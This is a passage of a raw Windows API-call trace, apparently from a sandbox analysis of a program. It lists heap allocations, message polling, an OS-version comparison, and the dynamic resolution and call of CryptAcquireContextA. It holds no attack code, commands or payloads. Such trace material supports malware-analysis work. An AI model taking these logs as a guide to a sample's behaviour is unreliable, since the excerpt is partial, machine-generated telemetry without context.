lpMsg=0x8bf250) returned 0 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0265.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.039] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0265.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.040] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.041] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.041] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0265.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0265.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.043] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.043] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.043] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.043] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.044] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.044] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0265.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.048] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0265.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0265.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0265.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466e30 [0265.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0265.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.049] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0265.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0265.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.050] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.052] 